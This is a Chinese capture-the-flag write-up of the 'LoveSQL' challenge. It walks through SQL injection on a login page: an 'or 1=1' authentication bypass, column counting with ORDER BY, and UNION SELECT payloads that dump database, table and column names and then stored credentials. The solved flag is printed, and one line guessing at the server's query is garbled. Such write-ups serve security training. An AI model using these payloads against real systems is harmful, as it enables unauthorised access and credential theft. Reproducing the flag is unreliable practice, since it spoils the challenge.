[极客大挑战 2019]LoveSQL 1解题思路
[极客大挑战 2019]LoveSQL 1
代码审计,发现表单方式为get提交到check.php
万能密码
admin' or 1=1 #
登录成功,这边我以为密码就是flag,结果并不是,结合题目信息,猜想这应该是根据账号密码的注入
尝试闭合?username=admin' and 1=1%23&password=d3c9cf30a12d1f13d4f778859fb16f73正常显示,?username=admin' and 1=2%23&password=d3c9cf30a12d1f13d4f778859fb16f73显示账号密码错误
存在闭合注入,order by探测字段,order by 4,显示列错误,判断出字段数为3
?username=admin' order by 4%23&password=d3c9cf30a12d1f13d4f778859fb16f73
这边有个小坑,之前一直用admin来做账号,结果发现闭合之后随便都是登录进去的,导致union显示不出来注入点,所以随便改了个username,然后进行union联合点查找
?username=abc' union select 1,2,3%23&password=111
根据显示判断2和3都是注入点(怀疑sql是这么写的:username= u s e r n a m e a n d p a s s w o r d = {username} and password= usernameandpassword={password},心可真大)
爆库(回显3为例)
?username=abc' UNION SELECT 1,2,group_concat(schema_name) from information_schema.schemata%23&password=111
发现数据库geek,爆表
?username=abc' UNION SELECT 1,2,group_concat(table_name) from information_schema.tables where table_schema="geek"%23&password=111
发现两个表,爆字段
?username=abc' UNION SELECT 1,2,group_concat(column_name) from information_schema.columns where table_name="l0ve1ysq1"%23&password=111
爆值
?username=abc' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=111
太长了我复制下来
Your password is '1cl4ywo_tai_nan_le,2glzjinglzjin_wants_a_girlfriend,3Z4cHAr7zCrbiao_ge_dddd_hm,40xC4m3llinux_chuang_shi_ren,5Ayraina_rua_rain,6Akkoyan_shi_fu_de_mao_bo_he,7fouc5cl4y,8fouc5di_2_kuai_fu_ji,9fouc5di_3_kuai_fu_ji,10fouc5di_4_kuai_fu_ji,11fouc5di_5_kuai_fu_ji,12fouc5di_6_kuai_fu_ji,13fouc5di_7_kuai_fu_ji,14fouc5di_8_kuai_fu_ji,15leixiaoSyc_san_da_hacker,16flagflag{0430bf83-c7cb-403f-8965-54dae295b134}'
成功找到flag
flag{0430bf83-c7cb-403f-8965-54dae295b134}